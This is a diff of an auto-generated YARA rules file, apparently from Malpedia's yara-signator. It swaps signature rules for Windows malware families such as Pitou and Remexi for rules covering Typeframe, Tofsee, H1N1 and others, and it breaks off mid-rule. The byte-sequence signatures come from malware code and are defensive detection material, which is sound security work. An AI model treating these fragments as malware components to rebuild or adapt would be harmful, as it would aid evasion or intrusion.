 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d3bdfc17-2f62-5214-be4f-5a36d3b3ac21"
+		id = "54b5c61d-baac-5ee7-bf22-feb7211e94de"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pitou"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pitou_auto.yar#L1-L113"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.typeframe"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.typeframe_auto.yar#L1-L148"
 		license_url = "N/A"
-		logic_hash = "7616b15e54bbcbd8174c3b9ed1b89eebeb0789927a8a07e3c44e1d6842f140f7"
+		logic_hash = "80d5f324e45f06373a108fe4a18abca87604cdaaeb894c2ac4120a591e037164"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119666,32 +120034,38 @@ rule MALPEDIA_Win_Pitou_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 80e703 c0eb05 80e303 80ff00 }
-		$sequence_1 = { 8bc2 5e 5a 59 5b }
-		$sequence_2 = { ac 8bda c1e305 03c3 8bda c1eb02 }
-		$sequence_3 = { 33c0 ac 8bda c1e305 03c3 8bda }
-		$sequence_4 = { c1e305 03c3 8bda c1eb02 03c3 }
-		$sequence_5 = { 03c3 8bda c1eb02 03c3 }
-		$sequence_6 = { 8a6201 80f457 8acc 80e103 8aec }
-		$sequence_7 = { 8a6201 80f457 8acc 80e103 8aec c0ed03 }
-		$sequence_8 = { 53 80ef18 80ff10 5b }
-		$sequence_9 = { 8acc 80e103 8aec c0ed03 }
+		$sequence_0 = { 004fb5 0500cccccc cc 48895c2410 }
+		$sequence_1 = { 002d???????? b505 00eb b405 }
+		$sequence_2 = { 004775 0300 3c75 0300 }
+		$sequence_3 = { 0026 b505 004fb5 0500cccccc }
+		$sequence_4 = { 006a0f 57 8bf0 e8???????? }
+		$sequence_5 = { 0004af 0300 f6ae0300e8ae 0300 }
+		$sequence_6 = { 01442468 8d4c0f78 83e978 8d44242c }
+		$sequence_7 = { 0056e5 0400 af e504 }
+		$sequence_8 = { 0102 0318 18040506071818 1818 }
+		$sequence_9 = { 008601010000 0fb69601010000 410fb60c30 0fb60432 }
+		$sequence_10 = { 0108 83c004 4a 75cd }
+		$sequence_11 = { 014424fc 83ec04 2bc1 58 0f83be000000 }
+		$sequence_12 = { 008501010000 410fb60c28 0fb69501010000 0fb6042a }
+		$sequence_13 = { 01442408 c74424fc00000000 014c24fc 83ec04 }
+		$sequence_14 = { 01442418 8d6c282c 83ed2c eb04 }
+		$sequence_15 = { 014424fc 83ec04 2bc2 58 720c }
 
 	condition:
-		7 of them and filesize < 1106944
+		7 of them and filesize < 2125824
 }
-rule MALPEDIA_Win_Liteduke_Auto : FILE
+rule MALPEDIA_Win_Usbferry_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0d5b03ab-c51a-5be5-8e11-3fd3c042290f"
+		id = "7bb46c52-bfd6-5303-a607-4235821612d8"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.liteduke"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.liteduke_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.usbferry"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.usbferry_auto.yar#L1-L168"
 		license_url = "N/A"
-		logic_hash = "7fa217ead580adfe5b357dd72935fa5df636ba1480b849cad849e2ead7958d39"
+		logic_hash = "246be59259afe1548e2a4d266237ef3554d233c2ef89881c3d19b399601a13ef"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119705,32 +120079,38 @@ rule MALPEDIA_Win_Liteduke_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4df8 e30b 0175f8 01f1 66c741fe0000 89f3 }
-		$sequence_1 = { ff7508 e8???????? a3???????? 014d08 }
-		$sequence_2 = { ff750c ff7508 e8???????? 85c0 750e 8b4508 ff30 }
-		$sequence_3 = { 0f31 a3???????? 58 5a c3 52 }
-		$sequence_4 = { ff7508 ff15???????? ff75fc ff15???????? 6a00 ff15???????? 5b }
-		$sequence_5 = { 83ec30 c745ec00000000 c745fc00000000 57 }
-		$sequence_6 = { b900010000 8dbd00fcffff f3a5 61 }
-		$sequence_7 = { f3a4 b000 aa 58 014508 e9???????? ff7508 }
-		$sequence_8 = { b801000000 c9 c20c00 55 89e5 6a00 }
-		$sequence_9 = { 5a 31c0 8a02 52 50 6a03 e8???????? }
+		$sequence_0 = { ff7210 8982f8000000 8b92fc000000 e8???????? 8b15???????? }
+		$sequence_1 = { 8b5df0 8b5514 8b4510 3bc8 }
+		$sequence_2 = { 3bf0 7d1e 2bc6 50 6a30 53 894510 }
+		$sequence_3 = { e8???????? 83c40c e8???????? 8d4d0c }
+		$sequence_4 = { 83c40c 8b45cc e9???????? 8b55e0 52 ff15???????? }
+		$sequence_5 = { 8d95a8feffff 83c2ff 899594f5ffff 8b8594f5ffff 8a4801 888da2f5ffff 838594f5ffff01 }
+		$sequence_6 = { 8d8db0f7ffff 51 e8???????? 83c40c }
+		$sequence_7 = { 899588f5ffff 8b8598f5ffff 8a08 888da1f5ffff 838598f5ffff01 80bda1f5ffff00 75e2 }
+		$sequence_8 = { c7404441342411 c7404cdbd5c0fe c740604fcda240 c740640f690ebc c74068b065f747 c7406c4a06d5fe }
+		$sequence_9 = { 59 85c0 752e 6a09 }
+		$sequence_10 = { f20f101d???????? 0f28ca 56 57 33ff }
+		$sequence_11 = { 0f83ae000000 c64405e000 40 83f820 7cef }
+		$sequence_12 = { 51 6a00 8b5510 52 8b45e0 50 }
+		$sequence_13 = { 7504 33c0 eb54 85c9 740e }
+		$sequence_14 = { 6aff 8b8da0f7ffff 51 ff15???????? 8b95a0f7ffff }
+		$sequence_15 = { 8a02 8845df 8345d801 807ddf00 75ee 8b4dd8 }
 
 	condition:
-		7 of them and filesize < 1171456
+		7 of them and filesize < 638976
 }
-rule MALPEDIA_Win_Veiledsignal_Auto : FILE
+rule MALPEDIA_Win_Furtim_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6c1343f8-3e47-50b2-a300-f82013ec0933"
+		id = "13c151d6-8fd6-5f90-84f5-0ee50200b32d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.veiledsignal"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.veiledsignal_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.furtim"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.furtim_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "9a6f92fe1de553c3683182fb5ec18013c09f63a6458b1c64fe2148d2dc0fd4cc"
+		logic_hash = "fe578793812b3cd44b1ebd86df72331630f9c46ef93b0c93a291bf5ca64790a1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119744,32 +120124,32 @@ rule MALPEDIA_Win_Veiledsignal_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bcf e8???????? 488bd7 4c8d05e3270400 83e23f }
-		$sequence_1 = { 4863c9 488d15a8360400 488bc1 83e13f }
-		$sequence_2 = { 4d8be1 498be8 4c8bea 4b8b8cfef0e50400 4c8b15???????? }
-		$sequence_3 = { 4c8d05eeab0000 488bf9 488d15ecab0000 b904000000 e8???????? }
-		$sequence_4 = { 418bc6 4d8d4d10 4c8d3d3c680400 41be04000000 4c8d1c40 }
-		$sequence_5 = { 81f95a290000 752b 488d0df8030000 b801000000 48890d???????? }
-		$sequence_6 = { 4c8bd1 b82a000000 0f05 c3 4c8bd1 b80f000000 }
-		$sequence_7 = { 7509 488d055f820400 eb04 4883c024 8938 e8???????? }
-		$sequence_8 = { 7513 488d15ad940000 488d0d86940000 e8???????? }
-		$sequence_9 = { 428844f13e 4b8b84e010e70400 42804cf03d04 38558f e9???????? ff15???????? 894597 }
+		$sequence_0 = { 33c0 8d7df8 ab 8d45f4 50 8d45dc 50 }
+		$sequence_1 = { 5a ff91fc020000 ebd7 5e c3 6a03 e8???????? }
+		$sequence_2 = { 7432 395d08 752d 395df0 7424 8b45f8 68???????? }
+		$sequence_3 = { 53 8d4dfc 51 53 895dfc ffd0 83f87a }
+		$sequence_4 = { 7520 8d55d8 8bce ff567c 8d45d8 }
+		$sequence_5 = { 897dfc 897df8 c745f424000000 ff9650040000 }
+		$sequence_6 = { c21000 55 8d6c2488 81ece8000000 53 }
+		$sequence_7 = { 50 ff93f0030000 8d45f4 50 ff93bc040000 648b3d18000000 }
+		$sequence_8 = { c7459018334400 c7459420334400 c745982c334400 c7459c38334400 c745a044334400 c745a454334400 c74500???????? }
+		$sequence_9 = { ff9618050000 5f 5e 5b c9 c20c00 ff7508 }
 
 	condition:
-		7 of them and filesize < 667648
+		7 of them and filesize < 622592
 }
-rule MALPEDIA_Win_Lowball_Auto : FILE
+rule MALPEDIA_Win_H1N1_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "94fba641-8dbf-5316-b4e6-0a547aece5a2"
+		id = "4f9432ad-24eb-5be0-8c5c-f54b004537b1"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lowball"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lowball_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.h1n1"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.h1n1_auto.yar#L1-L177"
 		license_url = "N/A"
-		logic_hash = "75931b935ec88e9d9d484d9216c8a6d089fe4ea50136062678650dec871b0d9d"
+		logic_hash = "e395b19b788b5872e8b41a06c72576193d2b704eacffdfa539ea6dd0de9a681c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119783,34 +120163,40 @@ rule MALPEDIA_Win_Lowball_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bcb 8d94243c090000 83e103 f3a4 83c9ff 8dbc2424030000 }
-		$sequence_1 = { f3a5 8d842428020000 8bcb 50 83e103 }
-		$sequence_2 = { 881c10 40 3bc6 7cf3 5b 5f }
-		$sequence_3 = { 8bd8 3bdd 895c2418 0f84db000000 8b94242c020000 55 }
-		$sequence_4 = { 55 50 ff15???????? 8bf0 3bf5 8974241c }
-		$sequence_5 = { 4f c1e902 f3a5 8bcb 8d942430060000 83e103 f3a4 }
-		$sequence_6 = { 8b3d???????? 68???????? 53 ffd7 8bf0 83c408 85f6 }
-		$sequence_7 = { c1e902 f3a5 8bcb 8d84243c090000 }
-		$sequence_8 = { 33c0 8d7c241d 8d54241c f3ab }
-		$sequence_9 = { 6a00 6a00 6a00 8d442428 6a00 50 ff15???????? }
+		$sequence_0 = { 7513 83bdecfeffff01 750a bb06000000 e9???????? 83bde8feffff06 }
+		$sequence_1 = { c7459044000000 8d4580 8d4d90 50 51 6a00 }
+		$sequence_2 = { 807dfe01 0f85d0000000 83bde8feffff05 750f 83bdecfeffff00 }
+		$sequence_3 = { 0bc0 0f84da010000 fc 8b7508 8b7df4 8b4b54 }
+		$sequence_4 = { 83bde8feffff06 7510 83bdecfeffff00 7507 bb05000000 eb17 }
+		$sequence_5 = { c745ac01000000 c745b010000000 c745b402000000 c745b820000000 }
+		$sequence_6 = { 50 ff75fc 6801000080 ff35???????? 58 ffd0 0bc0 }
+		$sequence_7 = { ab 05befa383a ab 352e1c3a58 ab ff75fc }
+		$sequence_8 = { ff15???????? 8bf0 85f6 745d 688c6e0010 56 }
+		$sequence_9 = { c1e908 330c85908f0010 42 3b54240c 72e4 f7d1 8bc1 }
+		$sequence_10 = { 59 59 c3 56 8b742408 6804010000 68f8820010 }
+		$sequence_11 = { 7620 8b742408 0fb60432 33c1 25ff000000 c1e908 330c85908f0010 }
+		$sequence_12 = { ff74242c b9686e0010 68546e0010 ff742430 b8606e0010 0f44c1 }
+		$sequence_13 = { 8b442404 33d2 a3???????? 42 b9c0850010 }
+		$sequence_14 = { 8d8578fdffff 50 68fc600010 6804010000 }
+		$sequence_15 = { 8d85f0fdffff 68dc600010 6804010000 50 e8???????? 83c414 8d45fc }
 
 	condition:
-		7 of them and filesize < 40960
+		7 of them and filesize < 172032
 }
-rule MALPEDIA_Win_Remexi_Auto : FILE
+rule MALPEDIA_Win_Tofsee_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "19c1296a-4241-5074-a9c8-857410d4cc23"
+		id = "77c418f3-cea7-5bdf-bba1-bed4438fce6c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.remexi"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.remexi_auto.yar#L1-L280"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tofsee"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tofsee_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "d7fd541a35f3fa538905c0988ed0ed78176c1f70ba37c8e34ed3bd3151c3e3a8"
+		logic_hash = "072fc19fe47ee3a53dbd73b9def787fe701419f7ff08ef93e84b3d80d7a1f117"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -119822,53 +120208,32 @@ rule MALPEDIA_Win_Remexi_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 c706ffffffff e8???????? 83c404 }
-		$sequence_1 = { 6a00 50 6a02 ff15???????? 6a10 }
-		$sequence_2 = { 52 6a00 68ffff1f00 ffd7 8bf0 }
-		$sequence_3 = { 53 50 ff15???????? 3dffffff00 }
-		$sequence_4 = { a3???????? c705????????02000000 890d???????? ffd6 6a00 6a00 }
-		$sequence_5 = { 6a10 8d4ddc 8bf0 51 }
-		$sequence_6 = { c705????????01000000 c705????????00000000 ff15???????? 8b0d???????? 51 ff15???????? }
-		$sequence_7 = { 7513 8b45d8 8b4818 8b5104 50 8955e0 }
-		$sequence_8 = { ff15???????? 57 8b3d???????? ffd7 56 ffd7 5e }
-		$sequence_9 = { 6828010000 8d8dccfeffff 6a00 51 }
-		$sequence_10 = { 8945e4 8945e8 b802000000 51 668945dc }
-		$sequence_11 = { 6a00 6a02 c785ccfeffff28010000 ff15???????? }
-		$sequence_12 = { a1???????? 68???????? 50 c705????????01000000 c705????????00000000 }
-		$sequence_13 = { 57 e8???????? 6a01 6a00 6a00 ff15???????? 8bf8 }
-		$sequence_14 = { e8???????? 83ec1c 8bcc 89642430 6aff 53 }
-		$sequence_15 = { 483305???????? 488bcb 488905???????? ff15???????? 488d15eb330100 }
-		$sequence_16 = { 015930 3b542408 0f8d10ffffff 8d3c52 }
-		$sequence_17 = { 015330 e9???????? 8b5314 3b5318 0f8d23020000 }
-		$sequence_18 = { 015330 41 894b0c e9???????? }
-		$sequence_19 = { 4c8d054d330100 488bd3 498bce e8???????? 85c0 0f8509010000 498b0c24 }
-		$sequence_20 = { 016b24 89e8 83c44c 5b }
-		$sequence_21 = { 015518 8b5d14 85db 0f8565fbffff }
-		$sequence_22 = { 014b30 bf???????? b903000000 8b742418 }
-		$sequence_23 = { 448b4010 488b8ee8040000 e8???????? 90 }
-		$sequence_24 = { 015330 8a10 eb84 8a5001 }
-		$sequence_25 = { c744243030010000 33d2 8d4a02 ff15???????? }
-		$sequence_26 = { 498bfc 4c89a5a8000000 48c74424400f000000 4c89642438 }
-		$sequence_27 = { e8???????? 48c785500100000f000000 4533f6 4c89b548010000 4488b538010000 488b442460 }
-		$sequence_28 = { 48895c2408 4889742410 57 4883ec20 488d3dea000200 }
-		$sequence_29 = { 488d1d5e6c0200 bf04000000 488bcb e8???????? 4883c328 48ffcf 75ef }
-		$sequence_30 = { 016b04 83c41c 5b 5e }
+		$sequence_0 = { c3 55 8bec 6864006400 ff7514 ff15???????? }
+		$sequence_1 = { ff7508 8d45e4 50 e8???????? 85c0 59 59 }
+		$sequence_2 = { 837f0800 7408 8b36 33ff 391e 75e1 85ff }
+		$sequence_3 = { e8???????? 8b35???????? 81fe???????? 59 7470 395e08 746b }
+		$sequence_4 = { 8b0d???????? 85c9 7503 33c0 c3 8bc1 56 }
+		$sequence_5 = { 8b4510 59 59 8b4d18 85c9 8945d8 8b4514 }
+		$sequence_6 = { ff35???????? ff742414 e8???????? 85c0 59 59 7474 }
+		$sequence_7 = { 50 687e660480 56 897d08 ffd3 83f8ff 750d }
+		$sequence_8 = { c745f001000000 eb46 53 ff7510 8d443730 50 }
+		$sequence_9 = { 8b7508 83c608 8bc6 8d4801 8a10 40 3ad3 }
 
 	condition:
-		7 of them and filesize < 614400
+		7 of them and filesize < 147456
 }
-rule MALPEDIA_Win_Harnig_Auto : FILE
+rule MALPEDIA_Win_Flawedgrace_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2adef0b1-84b8-5d38-81de-8e96334fdf2c"
+		id = "b7a2b679-4a09-5cd6-8d45-af761287421f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.harnig"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.harnig_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedgrace"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.flawedgrace_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "6b0da0575293c2afced8a49894e42bab87f6771cbe3d56035db53ed07d7267fe"
+		logic_hash = "1ff4be291ff6b1a953ca9c7eac4587b5db7acf2526c0381d7b2b4e64ad42f78b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119882,32 +120247,32 @@ rule MALPEDIA_Win_Harnig_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffd7 6a21 56 68???????? e8???????? 56 }
-		$sequence_1 = { c9 c20800 55 8bec 83ec54 57 6a10 }
-		$sequence_2 = { ff74240c 0fb674240c 6a02 e8???????? 6a08 }
-		$sequence_3 = { 59 68c78a3146 33c0 c745ac44000000 }
-		$sequence_4 = { 837dfc00 8d85e0fcffff 7406 8d85e0fbffff 50 8d85e0fdffff 50 }
-		$sequence_5 = { 81ec18080000 53 56 57 ba00010000 33c0 }
-		$sequence_6 = { 50 8d85e0fdffff 50 ffd7 6a04 56 }
-		$sequence_7 = { 0f845d020000 895dfc 8b1d???????? 837dfc00 8d85e0fcffff 7406 }
-		$sequence_8 = { 6a04 8d4df8 51 6a05 ff750c ffd0 bf6229211a }
-		$sequence_9 = { 6a04 c745c03c000000 897dc8 c745cc6c104000 8945d4 897dd8 }
+		$sequence_0 = { c685a4cdffff2c c685a5cdffff00 c685a6cdffff00 c685a7cdffff48 c685a8cdffffff c685a9cdffffce c685aacdffff0f }
+		$sequence_1 = { 83e03f 6bd030 895de4 8b049db8d34600 8945d4 8955e8 8a5c1029 }
+		$sequence_2 = { 56 57 8bf9 c745f800000000 8bf2 8975fc 85ff }
+		$sequence_3 = { c685dbc3ffff00 c685dcc3ffff00 c685ddc3ffff00 c685dec3ffff00 c685dfc3ffff00 c685e0c3ffff00 c685e1c3ffff00 }
+		$sequence_4 = { c6858ad9ffff00 c6858bd9ffff00 c6858cd9ffff00 c6858dd9ffff00 c6858ed9ffff00 c6858fd9ffff00 c68590d9ffff00 }
+		$sequence_5 = { c7410800000000 c74110ffffffff c74114ffffffff c7411c0c000000 c701???????? c741380f000000 c7413400000000 }
+		$sequence_6 = { 75f9 2bf1 b001 5f 8933 5e 5b }
+		$sequence_7 = { c68580d2ffff10 c68581d2ffff48 c68582d2ffff83 c68583d2ffffec c68584d2ffff20 c68585d2ffff4c }
+		$sequence_8 = { c744241800000000 50 ff7508 0f57c0 c744243400000000 8bf1 0f11442424 }
+		$sequence_9 = { 0f84f8000000 8d442450 50 68???????? 8d842460010000 6804010000 50 }
 
 	condition:
-		7 of them and filesize < 49152
+		7 of them and filesize < 966656
 }
-rule MALPEDIA_Win_Avrecon_Auto : FILE
+rule MALPEDIA_Win_Downeks_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e9aaaaa7-af2e-5870-9eba-7f7fa77b0103"
+		id = "30c812bc-f8ec-5caf-b497-f38e34394a41"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.avrecon"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.avrecon_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.downeks"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.downeks_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "e59963ec079d8f4d8ec354feb72326171934afc46817d03eebe4cd3c6c4dfb16"
+		logic_hash = "d7bf58e8bb3246f569b98be2a709ed5695e812ca867b1dab085a6c76aff4235d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119921,32 +120286,32 @@ rule MALPEDIA_Win_Avrecon_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 7431 6810270000 ff15???????? 837d0400 7420 }
-		$sequence_1 = { bf04010000 57 53 53 56 55 ff15???????? }
-		$sequence_2 = { e8???????? 8bf8 85ff 741f 56 8b35???????? 68???????? }
-		$sequence_3 = { 6a10 6a00 8d45dc 50 e8???????? 8d45f0 }
-		$sequence_4 = { c21000 33c0 ebf5 83c8ff ebf0 55 8bec }
-		$sequence_5 = { ebed c685dcebffff00 6a02 ff7508 ff15???????? ff7508 e8???????? }
-		$sequence_6 = { e8???????? 68???????? 53 e8???????? 85c0 0f84f0040000 8a08 }
-		$sequence_7 = { 50 8d85a8feffff 50 895d4c e8???????? 3bc3 }
-		$sequence_8 = { 49 7524 50 a3???????? ff15???????? e8???????? }
-		$sequence_9 = { 50 6a01 50 50 ff31 8975c0 50 }
+		$sequence_0 = { bfc4010904 8d44241c e8???????? 50 8d4c2428 6a40 51 }
+		$sequence_1 = { 0f8db6000000 897df8 8bc6 99 f77dfc 8b4cb7fc 85d2 }
+		$sequence_2 = { e8???????? 8b4d08 5f 8b06 8b5004 015804 8d74100c }
+		$sequence_3 = { b9081c0904 e8???????? 83c404 85c0 7e2f 50 68ec210904 }
+		$sequence_4 = { c3 68ec140804 56 e8???????? 83c408 5e 8be5 }
+		$sequence_5 = { eb34 81fefc000000 7507 bf544e0804 eb25 81fefd000000 7507 }
+		$sequence_6 = { c7401002010000 5f 5d c20400 837f1800 7417 6879020000 }
+		$sequence_7 = { 8b8d74ffffff 51 e8???????? 83c404 897588 895d84 889d74ffffff }
+		$sequence_8 = { 8bec 53 8b5d08 8b4330 56 33f6 57 }
+		$sequence_9 = { e9???????? 8d7dc4 e9???????? 8d7dc0 e9???????? 8d7dc4 e9???????? }
 
 	condition:
-		7 of them and filesize < 360448
+		7 of them and filesize < 1318912
 }
-rule MALPEDIA_Win_Sage_Ransom_Auto : FILE
+rule MALPEDIA_Win_Scarabey_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0cfc4781-9310-56a6-9786-dd48a9782a50"
+		id = "6e60c4db-c5cb-54f4-b442-438a01df9af6"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sage_ransom"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sage_ransom_auto.yar#L1-L161"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scarabey"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.scarabey_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "aa9c344ed40cd82065b24d270c712730728bf75ebcabdbfdec5a88ea8d283ad2"
+		logic_hash = "5ddb90a30fda6ca95ac7c6c807a159ecb2fde4cde650e7522ca27b96c3f88797"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -119960,40 +120325,34 @@ rule MALPEDIA_Win_Sage_Ransom_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 8d4c2430 51 e8???????? 8b542438 6a00 }
-		$sequence_1 = { 8da42400000000 8b442418 50 ffd7 8b742414 85f6 }
-		$sequence_2 = { 8d0c24 51 50 ff15???????? 833c2402 7564 }
-		$sequence_3 = { 8b503c 01542430 8b4840 014c2434 8b5044 }
-		$sequence_4 = { 56 57 8b7b04 03f9 8bf1 }
-		$sequence_5 = { 85c0 7907 83c8ff 83c408 c3 833c2441 }
-		$sequence_6 = { 8b442410 56 57 8bfa }
-		$sequence_7 = { 90 6aff 56 ffd3 8d4c2410 }
-		$sequence_8 = { 014114 8b4318 014118 8b431c }
-		$sequence_9 = { 014110 8b4314 014114 8b4318 }
-		$sequence_10 = { 014108 8b430c 01410c 8b4310 }
-		$sequence_11 = { 891c24 89442404 e8???????? 891c24 e8???????? e9???????? 83bd54fffffff6 }
-		$sequence_12 = { 013c13 83c102 46 ebd3 }
-		$sequence_13 = { 0101 8b4304 014104 8b4308 014108 }
-		$sequence_14 = { 01410c 8b4310 014110 8b4314 }
-		$sequence_15 = { 0119 117104 83c110 83c210 }
+		$sequence_0 = { 6a01 8d95b8d2ffff 52 ff15???????? 6a00 6a00 6a01 }
+		$sequence_1 = { 52 ff15???????? 68ff000000 6a02 53 895c2450 }
+		$sequence_2 = { 53 6a00 56 8985ecd6ffff ffd7 83fb01 0f8410010000 }
+		$sequence_3 = { 8d8504e7ffff 50 c78504e7ffff94000000 ff15???????? 6a01 }
+		$sequence_4 = { ff15???????? 8d4c2410 51 8bce e8???????? 6a0f }
+		$sequence_5 = { 7d04 8944241c 686666aa00 50 33db 6a02 895c2450 }
+		$sequence_6 = { 50 c78504e7ffff94000000 ff15???????? 6a01 8d8d54d2ffff 51 }
+		$sequence_7 = { 895c2450 c744244c68025300 ff15???????? 50 8d4c2444 e8???????? 8b442444 }
+		$sequence_8 = { 3d01010000 7d0d 8a4c181c 8888f0b15700 40 ebe9 33c0 }
+		$sequence_9 = { e8???????? 834dfcff 8d4dd4 c745d480185300 e8???????? e8???????? c3 }
 
 	condition:
-		7 of them and filesize < 335872
+		7 of them and filesize < 3580928
 }
-rule MALPEDIA_Win_Heyoka_Auto : FILE
+rule MALPEDIA_Win_Cabart_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f0f9fc3a-3361-5bee-bcdd-e0c602dd58ea"
+		id = "18a4d4f1-27f1-5b62-ac02-f2e216d2cf4e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.heyoka"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.heyoka_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cabart"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cabart_auto.yar#L1-L114"
 		license_url = "N/A"
-		logic_hash = "175329e4bd3a0dd34afbec31b74492ffb1225426c5eb776fbf2c975880999184"
+		logic_hash = "4c41cdb81a5db228073171586c9e5e6d6ecfd715a748c36291a1859ea7ac8fe5"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -120005,34 +120364,34 @@ rule MALPEDIA_Win_Heyoka_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b550c 52 8b4508 50 e8???????? 83c40c 8985ecfbffff }
-		$sequence_1 = { 52 8d85dcfdffff 50 e8???????? 83c404 8d8c05ddfdffff 51 }
-		$sequence_2 = { 83c408 68???????? 8d85fcfbffff 50 e8???????? 83c408 6a0a }
